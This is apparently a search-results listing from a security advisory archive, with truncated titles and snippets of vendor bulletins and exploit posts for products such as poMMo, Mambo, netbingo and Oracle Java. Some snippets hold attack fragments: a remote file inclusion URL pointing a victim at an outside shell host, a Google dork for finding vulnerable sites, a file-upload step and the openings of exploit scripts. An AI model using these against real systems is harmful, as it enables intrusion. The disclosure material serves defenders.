47153 matches found
BF, XSS, IAA и CSRF уязвимости в poMMo
Здравствуйте 3APA3A! Сообщаю вам о найденных мною Brute Force, Cross-Site Scripting, Insufficient Anti-automation и Cross-Site Request Forgery уязвимостях в poMMo. Brute Force WASC-11: http://site/pommo/index.php XSS WASC-08:...
A1 Solutions (cat_sell.php?cid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability A1 Solutions catsell.php?cid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.a1sols.com/ Persian Gulf 4 Ever! Dork : "Powered by A1 Solutions" "inurl:catsell.php?cid="...
ZDI-11-187: Oracle Java ICC Profile clrt Tag Parsing Remote Code Execution Vulnerability
ZDI-11-187: Oracle Java ICC Profile clrt Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-187 June 8, 2011 -- CVE ID: CVE-2011-0862 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java Runtime --...
[security bulletin] HPSBPI02575 SSRT090255 rev.1 - HP LaserJet MFP Printers, HP Color LaserJet MFP Printers, Certain HP LaserJet Printers, Remote Unauthorized Access to Files
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02004333 Version: 1 HPSBPI02575 SSRT090255 rev.1 - HP LaserJet MFP Printers, HP Color LaserJet MFP Printers, Certain HP LaserJet Printers, Remote Unauthorized Access to Files NOTICE: The...
[USN-989-1] PHP vulnerabilities
=========================================================== Ubuntu Security Notice USN-989-1 September 20, 2010 php5 vulnerabilities CVE-2010-0397, CVE-2010-1128, CVE-2010-1129, CVE-2010-1130, CVE-2010-1866, CVE-2010-1868, CVE-2010-1917, CVE-2010-2094, CVE-2010-2225, CVE-2010-2531, CVE-2010-2950,...
Secunia Research: Pulse CMS Arbitrary File Upload Vulnerability
====================================================================== Secunia Research 08/04/2010 - Pulse CMS Arbitrary File Upload Vulnerability - ====================================================================== Table of Contents Affected...
Huawei HG510 CSRF, Auth Bypass, DoS
Hello, Huawei HG510 is a device offered by the Serbian telecom operator, to provide ADSL Internet connection. Administration of settings on this device is allowed only from local LAN network but not only from private IP address eg 192.168.1.1 then You can access with public IP address only from...
djbdns misformats some long response packets; patch and example attack
The DNS packet format allows names to be compressed by replacing the suffix of a name with an encoded offset to another location in the packet where the suffix already exists. Because of the encoding scheme, valid offsets are limited to 16384. In djbdns 1.05, response.c handles name compression...
A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Louhi Networks Information Security Research Security Advisory Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability Release Date: 2008/10/31 Last Modified: 2008/10/28 Authors: Jussi Vuokko, CISSP [email protected] Henri Lindberg...
ZoneMinder Multiple Vulnerabilities
ZoneMinder Multiple Vulnerabilities by Filip Palian filip dot palian at pjwstk dot edu dot pl Software affected: ZoneMinder = 1.23.3 Severity: Critical Description from the vendor site: ZoneMinder is an integrated set of applications which provide a complete surveillance solution allowing capture...
iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Authorization Bypass Vulnerability
iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP Active Server Pages functionality to a web server. More information is...
S21SEC-041-en:Cezanne SW Cross-Site Scripting
S21Sec Advisory - Title: Cezanne SW Cross-Site Scripting ID: S21SEC-041-en Severity: Medium History: 02.Jan.2008 Vulnerability discovered Authors: Juan de la Fuente Costa [email protected] Fco Javier Puerta Rubio [email protected] URL: http://www.s21sec.com/avisos/s21sec-41-en.txt SUMMARY...
PHPSlideShow XSS Update
Vendor Site: http://www.zinkwazi.com/wp/scripts/ Version affected: 0.9.9.2 URL:http://www.example.com/scripts/demo/phpslideshow.php?directory=photos BID ref: 26576 By Jose Luis Gуngora Fernбndez PHPSlideShow is also susceptible the following inputs:...
Mozilla Foundation Security Advisory 2007-24
Mozilla Foundation Security Advisory 2007-24 Title: Unauthorized access to wyciwyg:// documents Impact: High Announced: July 17, 2007 Reporter: Michal Zalewski Products: Firefox Fixed in: Firefox 2.0.0.5 Description Michal Zalewski reported that it was possible to bypass the same-origin checks an...
netbingo v 2000 >> RFI
name & version :netbingo & 2000 vendor: http://www.proactech.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit :http://victim/bingoserver.php3?responsedir=http://shell...
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
================================================== Joomla/Mambo Component Taskhopper 1.1 /inc/ mosConfigabsolutepath RFI ================================================== Found By : Cold z3ro , [email protected] ================================================== Homepage: www.Hack-Teach.com...
LunarPoll (PollDir) Remote File Include Vulnerabilities
------------------------------------------------------------------------------------------------------------------- AYYILDIZ.ORG PreSents... Script:LunarPoll Script Download: dexxaboy.com/scripts/lunarpoll/download/ Contact: ilker Kandemir ilkerkandemiratmynet.com Code:...
Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit
============================================================================================== Kietu? = v4.0.0b2z urlhit Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Download from :...
SolpotCrew Advisory #10 - phpBB XS (phpbb_root_path) Remote File Include
SolpotCrew Community phpBB XS phpbbrootpath Remote File Include Download file : http://www.phpbbxs.eu/dload.php?action=category&catid=2 Bug Found By : NoGe a.k.a dajackass contact: [email protected] Website : http://nyubicrew.org/adv/Nogeadv02.txt Greetz: skulmaticthanks for sharing knowledge...
Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
============================================================================================== Signkorn Guestbook = v1.3 dirpath Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
[SA20136] FreeFTPd SFTP Key Exchange Algorithm String Buffer Overflow
TITLE: FreeFTPd SFTP Key Exchange Algorithm String Buffer Overflow SECUNIA ADVISORY ID: SA20136 VERIFY ADVISORY: http://secunia.com/advisories/20136/ CRITICAL: Highly critical IMPACT: DoS, System access WHERE: From remote SOFTWARE: FreeFTPd 1.x http://secunia.com/product/6138/ DESCRIPTION: A...
PHP5 Globals Vulnerability: with ?GLOBALS[foobar] you can set the value of the un-initialized $foobar variable.
PHP5 Globals Vulnerability: with ?GLOBALSfoobar you can set the value of the un-initialized $foobar variable. PHP5 Globals Vulnerability Name PHP5 Globals Vulnerability Systems Affected PHP5 verified on 5.1.1 and 5.1.2 Severity Critical Vendor www.php.net Advisory...
Sun Java System Web Proxy Server buffer overflow
No description provided...
Les Visiteurs v2.0.1 code injection vulnerability
Les Visiteurs is a great statistics script written in php. It gives you some graphicals informations on visitors of your website. This script was distributed by phpinfo.net but is no more maintained since a year. --------- In this version severals unprotected includes can be found in files: -...
Security Bulletin (MS00-081)
Microsoft Security Bulletin MS00-081 - -------------------------------------- Patch Available for New Variant of "VM File Reading" Vulnerability Originally posted: October 25, 2000 Summary ======= Microsoft has released a patch that eliminates a security vulnerability in the Microsoftr virtual...
[ MDVSA-2015:228 ] nodejs
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2015:228 http://www.mandriva.com/en/support/security/ Package : nodejs Date : May 6, 2015 Affected: Business Server 2.0 Problem Description: Updated nodejs package fixes security vulnerability: It was found that...
articleFR CMS 3.0.5 - Arbitrary File Upload
Vulnerability title: articleFR CMS 3.0.5 - Arbitrary File Upload Product: articleFR CMS Vendor: http://freereprintables.com Affected version: version 3.0.5 Fixed version: N/A Author: Tran Dinh Tien [email protected] & ITAS Team www.itas.vn ::DESCRITION:: - Vulnerabilities related to the upload ...
FreeBSD Security Advisory FreeBSD-SA-14:09.openssl [REVISED]
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-14:09.openssl Security Advisory The FreeBSD Project Topic: OpenSSL use-after-free vulnerability Category: contrib Module: openssl Announced: 2014-04-30 Affects:...
[CVE-2013-5702] Watchguard Server Center v11.7.4 Multiple Non-Persistent Cross-Site Scripting Vulnerabilities
Watchguard Server Center v11.7.4 Multiple Non-Persistent Cross-Site Scripting Vulnerabilities RCE Security Advisory http://www.rcesecurity.com 1. ADVISORY INFORMATION ----------------------- Product: Watchguard Server Center Vendor URL: www.watchguard.com Type: Cross-Site Scripting CWE-79 Date...
nginx buffer overflow
Buffer overflow on proxypass upstream HTTP server response processing. Buffer overflow on chunked response parsing...
SQLi found in Kodak Insite
Hello ... While investigating a recent installation of Kodak's Insite Creative Workflow System for my current employer, an SQL Injection vulnerability was discovered in its "Forgot Your Password?" page. An example of this application can be seen on the Kodak site...
ESA-2012-057: EMC Smarts Network Configuration Manager Multiple Vulnerabilities
ESA-2012-057.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-057: EMC Smarts Network Configuration Manager Multiple Vulnerabilities EMC Identifier: ESA-2012-057 CVE Identifier: CVE-2012-4614 CVE Identifier: CVE-2012-4615 Severity Rating: CVSS v2 Base Score: See below for individual...
Exploit - EasyITSP by Lemens Telephone Systems 2.0.2
?php errorreporting0; $arguments = getopt"a:b:c:"; $url = $arguments'a'; $idpod =$arguments'b'; $idend =$arguments'c'; ifcount$arguments!=3 echo ' Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 '."n"; echo ' Discovery users with passwords '."n"; echo ' '."n"; echo ' Author: Michal Blaszczak...
Security Advisory in LedgerSMBv 1.3.20 and below: Denial of Service vulnerability
A security oversight has been discovered in LedgerSMB 1.3 which could allow a malicious user to cause a denial of service against LedgerSMB or otherwise affect the way in which certain forms of data would get entered. In most cases we do not believe this to be particularly severe in the absence o...
python multiple security vulnerabilities
DoS, crissoite scripting, information leakage...
Checkpoint Abra - Vulnerabilities
Check Point Abra Vulnerabilities Vendor: Check Point Software Technologies Ltd Product web page: http://rus.checkpoint.com/products/abra/index.html; http://www.checkpoint.com/products/go/ Platforms: Windows XP, Vista, 7 32 bit Authors: Belov V., Komarov A. Group-IB Summary: Check Point Abra allow...
Quake 3 / ioquake3 traffic amplification vulnerability
Source of getstatus UDP message is not checked...
ZDI-11-305 : Oracle Java Applet Rhino Script Engine Remote Code Execution Vulnerability
ZDI-11-305 : Oracle Java Applet Rhino Script Engine Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-305 October 26, 2011 -- CVE ID: CVE-2011-3544 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java Runtime --...
ZDI-11-306 : Oracle Java IIOP Deserialization Type Confusion Remote Code Execution Vulnerability
ZDI-11-306 : Oracle Java IIOP Deserialization Type Confusion Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-306 October 26, 2011 -- CVE ID: CVE-2011-3521 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java...
Mambo CMS 4.6.x (4.6.5) | SQL Injection
Mambo CMS 4.6.x 4.6.5 | SQL Injection 1. OVERVIEW Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection. 2. BACKGROUND Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used...
ESA-2011-024: EMC Captiva eInput multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-024: EMC Captiva eInput multiple vulnerabilities. EMC Identifier: ESA-2011-024 CVE Identifier: CVE-2011-1743, CVE-2011-1744 Affected products: EMC SW: EMC Captiva eInput 2.1.1 Vulnerability Summary: EMC Captiva eInput contains two...
Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vendors libc/glob GLOBBRACE|GLOBLIMIT memory exhaustion Author: Maksymilian Arciemowicz http://netbsd.org/donations/ http://securityreason.com/ http://cxib.net/ Date: - Dis.: 19.01.2011 - Pub.: 02.05.2011 CVE: CVE-2011-0418 Affected Software...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
[USN-1055-1] OpenJDK vulnerabilities
=========================================================== Ubuntu Security Notice USN-1055-1 February 01, 2011 openjdk-6, openjdk-6b18 vulnerabilities CVE-2010-4351, CVE-2011-0025 =========================================================== A security issue affects the following Ubuntu releases:...
[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0
waraxe-2010-SA078 - Multiple Vulnerabilities in CruxCMS 3.0.0 =============================================================================== Author: Janek Vind "waraxe" Date: 27. December 2010 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-78.html Affected Software: CruxCMS is a...
CVE-2010-2375: WebLogic Plugin HTTP Injection via Encoded URLs
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: WebLogic Plugin HTTP Injection via Encoded URLs Release Date: 2010-07-13 Application: WebLogic Plugin...
Mambo 4.6.3 arbitrary file upload
Step 1 Using post method send file to: http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tinymce/filemanager/connectors/php/connector.php?Command=FileUpload file should have one of the following extensions: zip, doc, xls, pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla...
(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->
!/usr/bin/python -------------------------------------------------------------------------------- POST var 'resetpwemail' BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-- -------------------------------------------------------------------------------- CMS INFORMATION: --WEB:...
Microsoft Security Bulletin MS09-026 - Important Vulnerability in RPC Could Allow Elevation of Privilege (970238)
Microsoft Security Bulletin MS09-026 - Important Vulnerability in RPC Could Allow Elevation of Privilege 970238 Published: June 9, 2009 Version: 1.0 General Information Executive Summary This security update resolves a publicly disclosed vulnerability in the Windows remote procedure call RPC...
Oracle Secure Backup Multiple Denial Of Service vulnerabilities
Oracle Secure Backup Multiple Denial Of Service vulnerabilities 2009.January.13 Fortinet's FortiGuard Global Security Research Team Discovers multiple vulnerabilities in Oracle Secure Backup Summary: ======== Multiple Denial Of Service vulnerabilities exist Oracle Secure Backup 10.2.0.2 through...